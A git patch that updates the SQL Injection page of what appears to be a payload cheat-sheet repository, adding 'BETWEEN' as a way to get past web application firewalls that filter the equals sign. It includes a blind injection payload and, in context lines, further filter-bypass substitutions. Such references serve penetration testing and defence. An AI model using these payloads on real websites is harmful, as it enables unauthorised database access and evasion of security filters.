From 135af74acda9b37a3febf14950dd0de91d923d9d Mon Sep 17 00:00:00 2001
From: duongdpt <duong.01110129@gmail.com>
Date: Mon, 28 Oct 2019 22:26:28 +0700
Subject: [PATCH] Update README.md

Add bypass waf using BETWEEN
---
 SQL Injection/README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 8099f6d..8d5162b 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -440,12 +440,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
 SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
 ```
 
-No Equal - bypass using LIKE/NOT IN/IN
+No Equal - bypass using LIKE/NOT IN/IN/BETWEEN
 
 ```sql
 ?id=1 and substring(version(),1,1)like(5)
 ?id=1 and substring(version(),1,1)not in(4,3)
 ?id=1 and substring(version(),1,1)in(4,3)
+?id=1 and substring(version(),1,1) between 3 and 4
 ```
 
 Blacklist using keywords - bypass using uppercase/lowercase
@@ -461,7 +462,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator
 ```sql
 AND   -> &&
 OR    -> ||
-=     -> LIKE,REGEXP, not < and not >
+=     -> LIKE,REGEXP, BETWEEN, not < and not >
 > X   -> not between 0 and X
 WHERE -> HAVING
 ```